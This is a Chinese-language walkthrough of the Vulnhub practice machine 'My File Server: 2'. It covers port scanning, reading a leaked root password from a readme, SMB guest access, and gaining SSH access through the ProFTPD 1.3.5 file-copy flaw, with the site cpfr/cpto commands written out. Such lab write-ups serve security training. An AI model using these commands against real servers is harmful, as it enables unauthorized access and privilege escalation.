Vulnhub靶机My File Server: 2渗透测试详解
Vulnhub靶机介绍:
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。
这是一个漏洞靶机,老样子需要找到flag即可。
Vulnhub靶机下载:
官方下载:https://download.vulnhub.com/myfileserver/My_file_server_2.ova
Vulnhub靶机安装:
下载好了把安装包解压 然后使用Oracle VM打开即可。

Vulnhub靶机漏洞详解:
①:信息收集:
**kali里使用
netdiscover
发现主机**
渗透机:kali IP :192.168.0.104 靶机IP :192.168.0.103
使用命令:
nmap -sS -sV -A -n -p- 192.168.0.103


**发现开启了很多端口 先使用工具老样子扫描
80
端口
dirsearch
发现了一个readme.txt 得到一个密码:
root/root1
**


②:FTP匿名登入
**尝试
FTP
登入 发现没有权限 尝试匿名发现里面也没有可以利用的信息。**


③:SSH私钥登入
**接着尝试
SSH
登入失败,需要私钥才能登入!**

④:SMB共享服务:
**这里还有个文件共享服务
Smb
先尝试使用
smbmap
进行扫描查看文件,发现存在私钥文件 等下生成一个进行替换即可。**



smbclient '\\192.168.159.187\smbdata' guest #登入smb

**生成私钥:
ssh-keygen
**


⑤:漏洞发现(ProFTPD 1.3.5):
**这里还有个
2121
端口 发现版本号为:
ProFTPD 1.3.5
使用本地漏洞库
searchsploit
搜一下看看有没有相关利用文件**

⑥:漏洞利用:
发现存在文件复制漏洞尝试利用:
nc192.168.0.103 2121
site cpfr /smbdata/authorized_keys
site cpto /home/smbuser/.ssh/authorized_keys # 一般服务创建时会同时建一个smbuser用户


**直接
ssh
登入
smbuser
用户
su root
输入上面获取到的密码直接是
root
权限了**


至此获取到了flag,渗透测试结束。
Vulnhub靶机渗透总结:
这个靶机难度适中
**1.信息收集 获取ip地址 和端口信息 web扫描工具:
nikto,dirb,dirbuster
共享smb
枚举(工具得使用)smbmap
钥登入ssh私
文件复制漏洞利用**ProFTPD 1.3.5
希望对刚入门得小白有帮助!最后创作不易 希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!
版权归原作者 落寞的魚丶 所有, 如有侵权,请联系我们删除。